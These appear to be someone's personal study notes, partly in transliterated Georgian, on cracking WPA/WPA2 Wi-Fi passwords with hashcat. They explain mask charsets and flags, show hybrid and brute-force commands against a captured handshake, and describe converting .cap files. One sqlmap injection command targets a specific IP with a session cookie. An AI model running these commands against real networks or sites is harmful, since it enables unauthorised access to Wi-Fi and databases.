?I = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdefghijklmnopqrstuvwxyz
?H = 0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ
?s = <space>!"@#$%^&*() ... 
?a = ?i?u?d?s
?b = 0x00 - 0xff

-m 2500  telling hashcat to use wpa and wpa2 hash modes
-w 3  telling that i want perofrmace to be high 
--status show us actual status of hacking proccess on the screen
-a 6 tell hashcat i want to use hybrod wordlist and the mask attack mode
?d - this will tell hashcat to add number at the end of the password
tu gveqneba ?d?d?d?d anu daamate 4 cifri yvelas mosinjavs

hashcat.exe -d 1 -m 22000 -w 3 --status -a 6 395733_1698859845.hc22000 rockyou.txt ?d?d?d?d?d?d?d?d  --- worldistit gatexva


https://hashcat.net/wiki/doku.php?id=mask_attack

es air paili .cap. es unda gadavaqciot hc.22000 failad ro hashcatma waikitxos da gatexos kodi.

shevdivart saitze - https://hashcat.net/cap2hashcat/ da avtvirtavt .cap fails. gadavaqcevt .hc22000 failad da chamovtvirtavt

https://hashcat.net/cap2hashcat/

hashcat.exe -d 1 -m 22000 395733_1698859845.hc22000 -a 3 ?d?d?d?d?d?d?d?d 



sqlmap -u http://35.198.135.192:32157/index.php --cookie="PHPSESSID=d2ffbe7989f6b07058268c9376fb4e38" --forms --columns --random-agent

hcxpcapngtool -O hash.hc2000 -E essidlist hash.pcpang